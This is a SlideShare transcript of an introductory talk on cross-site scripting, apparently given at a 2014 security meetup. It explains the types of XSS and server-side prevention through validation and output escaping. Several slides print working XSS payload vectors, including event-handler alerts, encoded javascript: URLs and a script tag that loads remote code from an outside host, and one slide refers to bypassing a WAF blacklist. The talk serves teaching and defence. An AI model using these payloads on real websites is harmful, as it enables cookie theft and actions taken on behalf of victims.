Xss 101
Upcoming SlideShare
Loading in...5
×
 
  • 555 views

null Hyderabad Chapter - May 2014 Meet

null Hyderabad Chapter - May 2014 Meet

Statistics

Views

Total Views
555
Views on SlideShare
380
Embed Views
175

Actions

Likes
0
Downloads
15
Comments
0

2 Embeds 175

http://null.co.in 174
http://www.slideee.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Xss 101 Xss 101 Presentation Transcript

    • Cross Site Scripting (XSS)
    • What is XSS ? Cross Site Scripting lXSS is a vulnerability which when present in websites or web applications, allows malicious users (Hackers) to insert their client side code (normally JavaScript) in those web pages. lWhen this malicious code along with the original webpage gets displayed in the web client (browsers like IE, Mozilla etc), allows Hackers to gain greater access of that page.
    • XSS (-ve) effects stealing other user’s cookies l stealing their private information l performing actions on behalf of other users l redirecting to other websites l lShowing ads in hidden IFRAMES and pop-ups
    • Type of XSS attacks lNon-persistent (Reflected) lPersistent (Stored) lDOM Based
    • Non-persistent lWhen XSS code only gets displayed in the next page to the same user and not gets saved into persistent storage like database. lThis type of attack is less harmful, because Hacker can see only their own cookies and can make modifications in their own current opened pages.
    • Vector : %u3008script%u3009alert(document.domain);%u3008/script%u3009
    • Persistent XSS l In persistent type of XSS attack, XSS code gets saved into persistent storage like database with other data and then it is visible to other users also. l This type of attack is more vulnerable, because Hacker can steal cookies and can make modifications in the page.
    • Vector: <b onmouseover=alert(/000/);>Click me!</b>
    • DOM based attack lDOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM environment in the victim s browser used by the original client side script, so that the client side code runs in an unexpected manner. l That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment. l
    • Vector: #”><img src=x onerror=prompt(1);>
    • Prevention Never trust the user input data No matter where it’s coming from ( GET, POST, COOKIE etc.
    • Validation at server lBy sanitizing the input data, we can prevent the malicious code to enter in the system. lChecking the proper data types helps in cleaning the data. First of all we should restrict numeric data for numeric fields and only alphanumeric characters for text fields l lWhite lists – Allow <strong>, <em> and <br> only – Does help, but not 100% l lBlacklists – Block <script> and other attributes such as onload, onclick, onmouseover etc.
    • Demo:Bypassing Blacklist WAF
    • Validation at client side lBy performing client side (JavaScript) validation, before submitting the data to server, helps only in usability aspect of the website. lIt can’t provide any actual security, because user can disable the JavaScript. Many JavaScript libraries and frameworks are available for this.
    • Escaping output at server Problem characters can include < > " &.These characters can be replaced with HTML character entities. For example, < can be replaced with &lt;. 5 Rules for escaping output #1 - HTML Escape before inserting into element content #2 - Attribute Escape before inserting into attributes #3 - JavaScript Escape before inserting into JavaScript data values #4 - CSS Escape before inserting into style property values #5 - URL Escape before inserting into URL attributes
    • XSS vectors l<IMG SRC=javascript:alert('XSS')> l<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> l<IMG SRC=javascript:alert(&quot;XSS&quot;)> l<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> l<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> l<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> l<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#11 2;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;& #88;&#83;&#83;&#39;&#41;> l
    • References http://en.wikipedia.org http://ha.ckers.org/xss.html http://www.bugsheet.com/cheat-sheets/100-xss-vectors-by- ashar-javed http://www.acsa- admin.org/openconf2008/modules/request.php?module=oc_pr ogram&action=view.php&id=104
    • Thank you